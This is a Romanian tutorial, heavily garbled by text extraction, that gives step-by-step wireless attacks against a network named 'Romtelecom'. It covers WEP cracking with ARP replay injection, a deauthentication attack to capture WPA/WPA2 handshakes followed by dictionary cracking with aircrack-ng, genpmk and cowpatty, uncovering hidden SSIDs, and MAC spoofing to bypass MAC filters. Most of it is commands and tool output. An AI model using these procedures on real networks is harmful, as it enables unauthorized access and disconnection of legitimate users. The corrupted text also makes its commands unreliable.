Criptare si Cracking Wep (metoda de accelerare:Airodump,Aireplay,Aircrack); Criptare si Cracking WPA/WPA2 (metoda de accelerare:Aircrack,Genpmk,Cowpatty); Cum sa descoperiti un punct de acces in i!

i"il/ascuns(#idden $$%&); Cum sa clonati o adresa 'AC; Cum sa e itati (iltrele 'AC;

'i)ai *alentin &umitru

*ulnera"ilitati W+A,(W-P/WPA/WPA2/P$.)
%nainte de a pune in aplicare in(ormatiile cuprinse in acest scurt manual,ganditi/ a la moti ul care /ar determina sa (olositi toate aceste in(ormatii0Acest manual a (ost creat cu scop strict edu/ cati urmand ca cei ce or (olosi aceste in(ormatii in scopuri ce ar putea (i considerate mai putin etice sa/si asume atat responsa"ilitatea cat si consecintele (aptelor sale0 Pentru a putea aplica toate aceste in(ormatii eti a eti ne oie de un punct de lucru dotat cu sistemul de operare 1acktrack2 0 Puteti descarca acest sistem de operare accesand pagina o(iciala 1acktrack )ttp://www0"acktrack/linu30org/downloads/ urmand ca mai apoi sa instalati acest sistem de operare deri at +inu30 'ergand pe principiul con(orm caruia teoria si practica sunt interdependente om trece direct la practica urmand sa de!"atem in paralel tot ceea ce implica partea teoretica,ast(el: *om incepe desc)i!and o consola (terminal) si creand o inter(ata de monitori!are mon00Pentru a crea aceasta inter(ata om introduce in consola comanda:airmon-ng start wlan0 root4"t:56 airmon/ng start wlan7 Interface Chipset wlan0 (Fabricant)

Driver (driver) (monitor mode enabled on mon0)

Pentru a eri(ica daca aceasta inter(ata a (ost creata om (olosi comanda airmon-ng0 root4"t:56 airmon/ng Interface wlan0 mon0 Chipset (Fabricant) (Fabricant) Driver (driver)

+a (el de "ine se poate (olosi si comanda ifconfig iar in ca!ul in care inter(ata mon0 a (ost creata om o"ser a ca a (i a(isata alaturi de toate celelalte inter(ate acti e si (unctionale: root4"t:56 i(con(ig lo Link encap:Local Loopback inet addr:12 !0!0!1 "ask 2##!0!0!0 $% L&&%'(C) *$++I+, "-$:1./0. "etric 1 *1 packets:0 errors:0 dropped:0 overr2ns:0 frame:0 -1 packets:0 errors:0 dropped:0 overr2ns:0 carrer:0 mon0 Link encap:$+3%4C 5waddr:77:72:A2:18:17:29:77:77:77:77:77:77:77:77 $% '*&(DC(3- *$++I+, "$L-IC(3- "-$:1#00 "etric:1 *1 packets:0 6/ errors:0 dropped:0 frame:0 -1 packets:0 errors:0 dropped:0 overr2ns:0 carrer:0 wlan0 Link encap 4thernet 5waddr:77:72:A2:18:17:29 $% '*&(DC(3- "$L-IC(3- "-$:1#00 "etric:1 *1 packets:0 errors:0 dropped:0 overr2ns:0 frame:0 -1 packets:0 errors:0 dropped:0 overr2ns:0 carrer:0 colissions:0 t782e2elen:1000 *1 b9tes:0 (0!0 ') -1 b9tes:0 (0!0 ')

Criptare W-P si metoda de cracking:

Presupunand ca am acti at de:a o inter(ata de monitori!are mon7,asa cum am a!ut in capitolul anterior , om trece la pasii urmatori,pasi ce constau in scanarea si locali!area unui punct de acces (AP)0Pentru a descoperi si a(isa retelele disponi"ile din ra!a de actiune a dispo!iti ului nostru wire/ less utili!am comanda airodump-ng mon0

root4"t:56 airodump/ng mon7 C#<< 1$$%& <C:<&:=>:<7:7=:-2 1$$%& DE -lapsed : F7 s DE &ata/@ra D PW; ;GH 1eacons /<7 >7 >27= 6&ata , 6s 88 PW; /27 7 C# '" -,C C%P#-; AIB# -$$%& W-P Pro"es ;omtelecom ;omtelecom

<< 2F0 W-P +ost 7

$BAB%@,

;ate 7 /<

Packet 9

<C:<&:=>:<7:7=:-2 7=:72:A8:C8:C7:29

*om alege punctul de acces cu -$$%& ;omtelecom si 'AC <C:<&:=>:<7:7=:-2 si om initia practic procesul de cracking impotri a punctului de acces(AP) ;omtelecom e3ecutand comanda: airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecom mon0 /"ssid ?adresa 'AC a punctului de acces ;omtelecom /c << /canalul << sau (rec enta de emisie a punctului de control /w crackromtelecom ? denumirea (isierului in care or (i stocate pac)etele de date necesare root4"t:56 airodump/ng ?"ssid <C:<&:=>:<7:7=:-2 ?c << ?w crackromtelecom mon7

C#<< 1$$%&

DE -lapsed : < min 22 s D E &ata/@ra DE <F7 "ytes keystream <C:<&:=>:<7:7=:-2 D PW; ;GH 1eacons /<9 >7 J27= 6&ata , 6s <=8 PW; /2= 7 C# '" -,C C%P#-; AIB# -$$%& W-P Pro"es ;omtelecom ;omtelecom

<C:<&:=>:<7:7=:-2 1$$%&

<< 2F0 W-P +ost 7

$BAB%@,

;ate 7/<

Packet 27

<C:<&:=>:<7:7=:-2 7=:72:A8:C8:C7:29

Putem o"sera ca e3ista un client/dispo!iti conectat la punctul de acces ;omtelecom0Acest dis/ po!iti ne a a:uta sa o"tinem olumul de date(6&ata) necesar pentru a putea duce la "un s(arsit procesul de cracking0Am o"ser at (oarte multe tutoriale we" despre aceasta modalitate de cracking a unui punct de acces dar in acelasi timp am mai o"ser at ca ma:oritatea celor ce au pu"licat aces/ te tutoriale nu au apelat si la procedura de accelerare a procesului de cracking0@are de ceA %n continuare oi incerca atat sa e3plic cat sa si aplic aceasta procedura ce consta in accelera/ rea procesului de W-Pcracking,procedura ce poate (i (oarte utila re(erindu/ne la (aptul ca perioada necesara e3ecutarii procesului se poate reduce semni(icati 0 *om initia captura pac)etelor de date A;P (A;P Packets) utili!and airepla -ng urmand apoi sa rein:ectam (Packet in:ection) toate aceste pac)ete in retea0%n acest (el om reproduce sau simula mai multe raspunsuri A;P(A;P ;esponse)0 Cu cat om reproduce si rein:ecta mai multe raspunsuri A;P cu atat om mari (lu3ul de date din retea,reducand ast(el timpul necesar procesului de cracking0Bre"uie mentinut (aptul ca A;P este un protocol ce contine un olum de date presta"ilit si egal in toate ca!urile 0Colosindu/ne de

aceasta in(ormatie om putea distinge pac)etele A;P incluse in tra(icul de date din retea oricare ar (i aceasta: Ast(el:airepla -ng -! b 1C:1D:67:10:06:E5 " 06:0#:$%:C%:C0:#! mon0 /9 ? @ptiunea pentru reproducere A;P packets; /" ? Adresa 'AC a punctului de acces; /) ? Adresa 'AC a clientului/dispo!itiu ului de care ne (olosim pentru a reproduce pac)etele A;P root4"t:56 aireplay/ng /9 ?" <C:<&:=>:<7:7=:-2 ?) 7=:72:A8:C8:C7:29 mon7 root4"t:56 aireplay/ng /9 ?" <C:<&:=>:<7:7=:-2 ?) 7=:72:A8:C8:C7:29 mon7 B)e inter(ace 'AC (77:72:A2:18:17:29) doesnLt matc) t)e speci(ied 'AC (/))0 %(con(ig mon7 )w et)er 7=:72:A8:C8:C7:29 F:72:2> Waiting (or "eacon (rame (1$$%&: <C:<&:=>:<7:7=:-2) on c)annel << $a ing A;P reMuests in replayNarp/<7/79>J8>0cap Kou s)ould also start airodump/ng to capture replies0 ;ead >792 packets (got 27<= A;P reMuests and 27<7 AC.s), sent <J9F packetsO(277 pps) Pri iti consola in care se e3ecuta airodump-ng si eti o"ser a ca olumul de date a crescut semni/ (icati ,acest (apt datorandu/se procesului de accelerare produs de airepla C#<< 1$$%& <C:<&:=>:<7:7=:-2 1$$%& DE -lapsed : 9 min 22 s DE &ata/@ra DE <F7 "ytes keystream <C:<&:=>:<7:7=:-2 D PW; ;GH 1eacons /<9 >7 <J27= 6&ata , 6s <=822 PW; /2= 7 C# '" -,C C%P#-; AIB# -$$%& W-P Pro"es ;omtelecom ;omtelecom

<< 2F0 W-P +ost 7

$BAB%@,

;ate 7/<

Packet 27

<C:<&:=>:<7:7=:-2 7=:72:A8:C8:C7:29

&esc)ideti o consola(terminal) noua si e3ecutati comanda aircrack-ng crackromtelecom-01&cap /crackromtelecom/7<0cap este (isierul in care se stoc)ea!a pac)etele de date necesare procesului de cracking0 NOTA: C)iar daca am e3ecutat comanda aircrack-ng crackromtelecom-01&cap,acest (isier continua sa stoc)e!e pac)ete de date, asa cum om o"ser a in imaginile de mai :os,indi(erent daca om o"/ tine sau nu W-P.-K ul din prima incercare0 root4"t:56 aircrack/ng crackromtelecom/7<0cap @pening crackromtelecom/7<0cap ;ead <=8JJ2 packets0 6 < 1$$%& <C:<&:=>:<7:7=:-2 -$$%& ;omtelecom -ncryption W-P (<299= %*Ls)

C)oosing (irst network as target0 @pening crackromtelecom/7<0cap ;eading packets, please waitO

;e!ultatele a(isate pe ecran sunt mai mult sau mai putin similare re!ultatelor a(isate in imaginea de

mai :os, alorile reale (iind inlocuite cu aloarea G din moti e lesne de inteles0

Aircrack/ng <07 E77:77:77D Bested GGGGGG keys (got <2F2= %*Ls) .1 7 < 2 9 F 2 = > 8 J <7 << <2 dept) 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < "yte( ote) GG( 2<2) GG( 22=) GG( 2<2) GG( 2<2) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( >=8) GG( 2<2) GG( 22=) GG( 2<2) GG( >=8) GG( 2<2) GG( 22=) GG( 22=) GG( >=8) GG( 2<2) GG( 2<2) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 2<2) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 2<2) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 2<2) GG( 22=) GG( 2<2) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 2<2)

Asa cum spuneam in randurile de mai sus,este posi"il sa nu reusim sa o"tinem Wepkey/ul din prima incercare0%n acest ca! singura optiune ar (i sa asteptam0

Aircrack/ng <07 E77:77:77D Bested GGGGGG keys (got <2277 %*Ls) .1 < 2 9 F 2 = dept) 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < "yte( ote) GG( 22=) GG( GG( 2<2) GG( GG( 2<2) GG( GG( 2<2) GG( GG( 2<2) GG( GG( >=8) GG( 22=) 22=) 22=) 22=) 22=) 2<2) GG( GG( GG( GG( GG( GG( 22=) 22=) 22=) 22=) 22=) 2<2) GG( GG( GG( GG( GG( GG( 22=) 22=) 22=) 2<2) 2<2) 2<2) GG( GG( GG( GG( GG( GG( 22=) 2<2) 2<2) 2<2) 22=) 22=) GG( GG( GG( GG( GG( GG( 22=) 22=) 22=) 22=) 22=) 22=) GG( GG( GG( GG( GG( GG( 22=) 2<2) 2<2) 22=) 2<2) 2<2)

Cailed0 ,e3t try wit) <2777 %*Ls

,u a eti de ce sa a (aceti gri:i,in mod normal,procesul de cracking poate dura ore intregi,si depinde strict de olumul de date capturat si rein:ectat in retea0&ar (olosind aireplay/ng putem reduce aceasta perioada la ordinul minutelor0(2/<7 minute)0 Anali!am un pic sinta3a PCailed0 ,e3t try wit) <2777 %*LsQ unde %*(%nitiali!ation *ector) Procesul de cracking a (ost oprit deoarece inca nu am reusit sa o"tinem olumul de date necesar pentru a putea calcula Wepkey/ul,urmand ca acest proces sa se reia automat in momentul in care numarul de ectori de initiali!are o"inuti ar a:unge la 277770@data acti at , aircrack este setat sa initiali!e!e un proces de cracking din 2777 in 2777 de %*(aceasta aloare se poate modi(ica)0 Atunci cand om dispune de un numar su(icient de pac)ete de date,Wepkey/ul a (i calculat si re!ultatul a (i a(isat pe ecran asa cum om edea in imaginea de mai :os:

Aircrack/ng <07 E77:77:77D Bested GGGGGG keys (got 27>2= %*Ls) .1 7 < 2 9 F 2 = > 8 J <7 << <2 dept) 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < 7/ < "yte( ote) GG( 2<2) GG( 22=) GG( 2<2) GG( 2<2) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( >=8) GG( 2<2) GG( 22=) GG( 2<2) GG( >=8) GG( 2<2) GG( 22=) GG( 22=) GG( >=8) GG( 2<2) GG( 2<2) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 2<2) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 2<2) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 22=) GG( 2<2) GG( 2<2) GG( 22=) GG( 2<2) GG( 2<2) GG( 22=) GG( 2<2) GG( 22=) GG( 2<2) GG( 2<2)

.-K C@I,& E GG:GG:GG:GG:GG:GG:GG:GG:GG:GG:GG:GG D &ecrypted correctly : <77R

Pentru a calcula(crack) un wepkey(parola wi(i) a unui punct de acces,in ca!ul nostru ;omtelecom a em ne oie de un numar su(icient de pac)ete de date,parola wep putand (i calculata indi(erent de comple3itatea sau lungimea acesteia0

Criptare WPA/WPA2 si metoda de cracking:

WPA este un protocol de securitate ce (oloseste ca algoritm de criptare a pac)etelor de date algoritmul B.%P (Temporal Key Integrity Protocol)0Bre"uie mentionat (aptul ca si protocolul W-P pe care l/am de!"atut in capitolul anterior (oloseste acleasi algoritm pentru a cripta pac)etele de date wireless dar in ca!ul WPA,c)eile se generea!a in alt mod0 WPA2 a (ost creat cu scopul de a im"unatati ersiunea WPA,(olosind ca algoritm de criptare un algoritm mult mai e(icient si mai ro"ust numit A-$ (Ad anced Encryption Standard)0Asa cum om o"ser a in randurile de mai :os,atat WPA cat si WPA2 sunt doua protocoale de date ulnera"ile atacurilor "a!ate pe dictionare0Pentru a putea reali!a cu succes un atac WPA/WPA2 am a ea ne oie de 2 (actori: <0In dictionar "ine "us la punct,care sa contina (ra!e(si nu numai) speci(ice !onei in care a a(lati0 20Al doilea (actor consta in capturarea unui WPA #and s)ake sau un salut pe F cai0*om anali!a cum se e(ectuea!a acest WPA #and $)ake cu a:utorul imaginii de mai :os e3plicand in acelasi timp si modul sau de (unctionare:

Poate ca multi dintre oi a eti intre"a PCe este un PB. sau cum se generea!aAQ0PB. (Pair/ wise Bransition .ey) este o c)eie de criptare (olosita in procesul WPA #and $)ake si se o"tine prin concatenarea mai multor (actori,acestia (iind,adresa 'AC a punctului de acces,adresa 'AC a clien/ tului,P'., aloarea (Anonce) si aloarea ($nonce)0$a trecem la (apteS &ar innainte sa incepem,tre"uie mentionat (aptul ca pentru a o"tine parola unei retea wireless atat procedura cat si pasii ce tre"uiesc urmati or (i aceasi indi(erent daca protocolul de securitate atacat ar (i WPA sau WPA20

Presupunand ca am setat punctul de acces ;omtelecom sa aplice o protectie WPA sau WPA2 , desc)ideti o consola 1acktrack si introduceti: airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecom'($ mon0

root4"t:56 airodump/ng ?"ssid <C:<&:=>:<7:7=:-2 ?c << ?w crackromtelecomWPA mon7 C#<< 1$$%& <C:<&:=>:<7:7=:-2 1$$%& DE -lapsed : < min 72 s D E &ata/@ra D PW; ;GH 1eacons /<2 >7 <27= 6&ata , 6s <7 PW; 7 C# '" -,C C%P#-; AIB# -$$%& B.%P Pro"es ;omtelecom

<< 2F0 WPA +ost

$BAB%@,

;ate

Packet

%n ca!ul in care nu e3ista nici un client conectat la punctul de acces ;omtelecom , a tre"ui sa asteptam momentul in care un client se a conecta la acest punct de control sau sa e(ectuam un atac &@$0Prin acest atac om o"liga practic toti clientii conectati sa se deconecte!e,urmand ca in momen/ tul in care or incerca sa se reconecte!e sa capturam #ands)ake pe care acesta il e(ectuea!a cu pun/ ctul de acces0Atacul a decurge ast(el: <0&esc)ideti o consola noua 1acktrack; 20%n consola e3ecutati comanda airepla -ng -deaut" 1 a 1C:1D:67:10:06:E5 mon 0 root4"t:56 aireplay/ng ?/deaut) < ?a <C:<&:=>:<7:7=:-2 mon 7 7=:27:7= Waiting (or "eacon (rame (1$$%& <C:<&:=>:<7:7=:-2) on c)annel << ,1:B)is attack is more e((ecti e w)en targeting a connected wireless client(/c TclientLs 'ACU)0 7=:27:7= $ending &eAut) to "roadcast ?/ 1$$%&: E<C:<&:=>:<7:7=:-2D root4"t:56 %n momentul in care un client se conectea!a la punctul de acces structura consolei a (i urmatoarea: C#<< 1$$%& <C:<&:=>:<7:7=:-2 1$$%& DE -lapsed : <= min 72 s D E &ata/@ra DE WPA #ands)ake <C:<&:=>:<7:7=:-2 D PW; ;GH 1eacons /<= >7 92== 6&ata , 6s <78 PW; /92 7 C# '" << 2F0 +ost 7 -,C C%P#-; AIB# -$$%& WPA B.%P Pro"es ;omtelecom ;omtelecom

$BAB%@,

;ate 7/<

Packet 97

<C:<&:=>:<7:7=:-2 7=:72:A8:C8:C7:29

%n momentul in care se o"tine o captura WPA #ands)ake,aceasta se a a(isa in coltul superior dreapta al consolei0 -3: WPA #ands)ake <C:<&:=>:<7:7=:-20%ntrerupem procesul airodump apasand Ctrl/C0 %mediat om initia si procesul de cracking dar inainte de asta tre"uiesc (acute cate a preci!ari0 Asa cum spuneam ,in ca!ul unui atac WPA/WPA2 e(icacitatea atacului depinde strict si in totalitate de dictionarul de care dispuneti01acktrack contine un asemenea dictionar stocat intr/un (isier numit darkc7de0lst,dar, de a lungul timpului am o"ser at ca acest dictionar nu este (oarte e(icient in ca!ul in care e(ectuati un atac asupra unui punct de acces din !ona -uropei de est si nici macar in !ona -u/ ropei centrale sau de est($pania,Cranta,%talia)0 *a pot spune cu siguranta ca in urma stransei cola"orari ale gruparilor PAnonymousQ ce acti ea/ !a in di(erite !one ale glo"ului,au (ost intocmite dictionare speci(ice !onelor respecti e0

&ar datorita (aptului ca acest manual a (ost creat cu interes strict demonstrati ne om re!uma la (olosirea dictionarului pus la dispo!itie de sistemul de operare 1acktrack iar pentru a in oca acest dictionar om desc)ide o consola noua si om introduce comanda: aircrack-ng crackromtelecom'($&cap w )pentest)passwords)wordlists)darkc0de&lst Ast(el: root4"t:56 aircrack/ng crackromtelecomWPA0cap ?w /pentest/passwords/wordlists/darkc7de0lst

Aircrack/ng <07 E77:77:77D Bested 8>=8J7 keys (>2=0= k/s)

.-K C@I,&S EGGGGGGGGGD 'aster .ey: Bransient .ey: GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG

-AP@+ #'AC:

GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG GG

Asa cum spuneam si in capitolul anterior e3ista un mod de a accelera procesul de cracking WPA WPA2 pe care il om de!"ate si e3plica in continuare0 Pentru a putea accelerarea procesul de cracking WPA si a reduce perioada de timp necesara o"/ tinerii parolei a tre"ui sa calculam aloarea (actorului P'.(Pairwise 'aster .ey) sau P$.(Pre/$)ared .ey)0*aloarea P'. se o"tine prin concatenarea altor doi (actori importanti precum $$%& si c)eie0 *om (olosi un generator P'. numit genpmk ast(el desc)i!and o consola noua in 1acktrack si in/ troducand comanda : genpmk -f )pentest)passwords)wordlists)darkc0de&lst d (*+-crackromtelecom'($ -s ,-omtelecom. root4"t:56 genpmk /( /pentest/passwords/wordlists/darkc7de0lst ?d P'./crackromtelecomWPA /s P;omtelecomQ genpmk <0< WPA/P$. precomputation atack0 T:wrig)t4)as"org0comU Cile P'./crackromtelecomWPA does not e3ist, creating0 key no0 <777:GGGGGGG key no0 2777:GGGGGGGGG key no0 9777:GGGGG key no0 F777:GGGGGGGG key no0 2777:GGGGGGG key no0 =777:GGGGGGGGGG

Acum ca am generat P'./ul acesta se a stoca in (isierul P'./crackromtelecomWPA urmand sa (olosim comanda cowpatt pentru a e3trage parola necesara cone3iunii: cowpatt d (*+-crackromtelecom'($ s ,-omtelecom. r crackromtelecom'($-01&cap

root4"t:56 cowpatty ?d P'./crackromtelecomWPA ?s P;omtelecomQ ?r crackromtelecomWPA/7< 0cap Collected all necessary data to mount crack against WPA/P$. passp)rase0 $tarting dictionary atack0 Please "e patient0 key key key key key key key key key key key key key key key key key key no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 <777:GGGGGGG 2777:GGGGGGGGG 9777:GGGGG F777:GGGGGGGG 2777:GGGGGGG =777:GGGGGGGGGG >777:GGGGGGGG 8777:GGGGGGGG J777:GGGGGGG <7777:GGGGGGGG <<777:GGGGGG <2777:GGGGGGGG <9777:GGGGGGGGGGG <F777:GGGGGGGGG <2777:GGGGGGGGGG <=777:GGGGGGGGGGGG <>777:GGGGGGGGG <8777:GGGGGGGGGGGGGG

%n momentul in care a (ost descoperita parola structura consolei a (i urmatoarea:

key key key key key key key key key key key key

no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0 no0

<<<777:GGGGGGG <<2777:GGGGGGGGG <<9777:GGGGG <<F777:GGGGGGGG <<2777:GGGGGGG <<=777:GGGGGGGGGG <<>777:GGGGGGGG <<8777:GGGGGGGG <<J777:GGGGGGG <27777:GGGGGGGG <2<777:GGGGGG <22777:GGGGGGGG

B)e P$. is PGGGGGGGGQ <22777 passp)rases tested in EGD seconds0 EGD passp)rases/sec

Bre"uie mentionat (aptul ca parola WPA/WPA2 poate (i calculata numai in ca!ul in care aceasta este inclusa in dictionarul utili!at in procesul de cracking

Cum sa descoperiti o retea W%C% in i!i"ila(#idden $$%&)

Pentru a putea descoperi o retea W%C% in i!i"ila/ascunsa (#idden $$%&) om desc)ide o consola si om in oca airodump/ng ast(el:

C#<< 1$$%&

DE -lapsed : 7 min 72 s D E &ata/@ra DE PW; ;GH 1eacons /<= /F2 >7 <> 92== 7 6&ata , 6s <78 7 PW; /92 7 = C# '" -,C C%P#-; AIB# -$$%& ;omtelecom Tlengt): =U

<C:<&:=>:<7:7=:-2 28:-C:7<:92:92:=F 1$$%& 28:-C:7<:92:92:=F

<< 2Fe WPA B.%P << 2Fe WPA B.%P +ost 7 Packet 97 Pro"es

$BAB%@, 7=:72:A8:C8:C7:29

;ate 7/<

Tlengt): =U

'etoda consta in asteptarea momentului in care un client autori!at se a conecta la punctul de ac/ ces i!at0 %ncercarea,implicit conectarea clientului la punctul de acces in i!i"il/ascuns a genera o solicitare (Pro"e ;eMuest) din partea aceluiasi client si un raspuns (Pro"e ;esponse) din partea dispo!iti ului(AP) sau a punctului de acces0 Atat solicitarea cat si raspunsul contin $$%&/ul punctului de acces, de! aluind practic identitatea punctului de acces in i!i"il0 Asa cum eti o"ser a punctul de acces in i!i"il a (ost descoperit,acesta (ind marcat Tlengt): =U0

Cum sa inselati (iltrele 'AC ('AC Cilters)

Ciltrele 'AC se "a!ea!a pe o lista ce contine adresele 'AC ale clientilor autori!ati0 Boate celelalte dispo!iti e,ale caror adrese 'AC nu sunt incluse in lista de (iltrare 'AC gestio/ nata de administratorul de retea, nu or (i o"tine autori!atia de cone3iune la punctul de acces0 *eti putea edea cat de usor poate (i e itat acest (iltru,clonand o adresa 'AC a unui client sau dispo!iti a carui adresa 'AC este inclusa in lista clientilor/dispo!iti elor autori!ate: %n consola 1ackBrack/+inu3 e3ecutati urmatoarea comanda: airodump-ng c11 a bssid /*$C0punct0acces01i2at3 mon0 %n ca!ul nostru om (olosi un punct de acces cu -$$%& P;omtelecomQ si a carui adresa 'AC este <C:<&:=>:<7:7=:-2 ast(el:

root4"t:56 airodump/ng ?c<< ?a ?"ssid <C:<&:=>:<7:7=:-2 mon7

;e!ultatul a(isat pe ecran a (i urmatorul:

C#<< 1$$%&

DE -lapsed : F7 s DE27<9 PW; ;GH 1eacons /> J7 27= 6&ata , 6s <8 PW; /<F 7 C# '" -,C C%P#-; AIB# -$$%& ;omtelecom Pro"es ;omtelecom

<C:<&:=>:<7:7=:-2 1$$%&

<< 2Fe @P, +ost 7 Packet 9

$BAB%@,

;ate 7 /<

<C:<&:=>:<7:7=:-2 7=:72:A8:C8:C7:29 Inde:

/c << $peci(ica numarul canalului sau (rec enta de emisie a punctului de acces; /a A(isea!a numai adresele 'AC ce corespund clientilor ce de:a au o"tinut autori!atie de cone3iune la punctul de acces i!at0 %n momentul in care in consola(terminal) 1ackBrack/+inu3 se a a(isa adresa 'AC a unui client conectat la punctul de acces om retine adresa 'AC a clientului respecti urmand sa (o/ losim acea adresa pentru a o"tine autori!atie de cone3iune,implicit sa e ita/insela (iltrele 'AC0 Pentru a putea s)im"a adresa 'AC a inter(atei de cone3iune in asa (el incat sa coincida cu adresa 'AC a unui dispo!iti autori!at,in ca!ul nostru 7=:72:A8:C8:C7:29 a tre"ui sa urmam pasii urmatori: <0*om de!acti a inter(ata wlan7; ifconfig wlan0 down 20*om sc)im"a adresa 'AC atri"uita inter(atei pe care noi o (olosim inlocuind aceasta adresa cu adresa 'AC a dispo!iti ului autori!at: macc"anger -m 7=:72:A8:C8:C7:29 wlan0 root4"t:56 macc)anger /m 7=:72:A8:C8:C7:29 wlan7 Current 'AC: 77:72:A2:18:17:29 (Ca"ricant) Caked 'AC: 7=:72:A8:C8:C7:29 (Ca"ricant)

90*om reacti a inter(ata wlan7; ifconfig wlan0 up F0*om eri(ica daca intr/ade ar sc)im"area adresei 'AC a (ost e(ectuata: macc"anger --s"ow wlan0

root4"t:56 macc)anger //s)ow wlan7 Current 'AC: 7=:72:A8:C8:C7:29 (Ca"ricant)

,@BA: Prin intermediul comen!ii macc"anger puteti sc)im"a adresa 'AC a inter(atei wlan7 atata timp cat aloarea noua a acesteia a (i una ala"ila0 %ntroduceti in consola macc"anger --list sau macc"anger -l si eti o"ser a ca a (i a(isata o lista cu ma:oritatea (a"ricantilor si numarul de identi(icare 'AC0&e e3emplu primele trei grupuri de 2 ci(re -G: 77:J7:2> /%ntel Corporation repre!inta amprenta (a"ricantului0C)iar daca oi uti/ li!ati o inter(ata (a"ricata de C%$C@ sa spunem,puteti sc)im"a adresa 'AC ast(el incat sa conste ca (olositi o inter(ata (a"ricata de %ntel ast(el: macc"anger --mac 77:J7:2>:<<:<<:<< wlan0 77:J7:2> amprenta (a"ricantului;

&umitru 'i)ai *alentin: mi)ai alentindumitru4gmail0com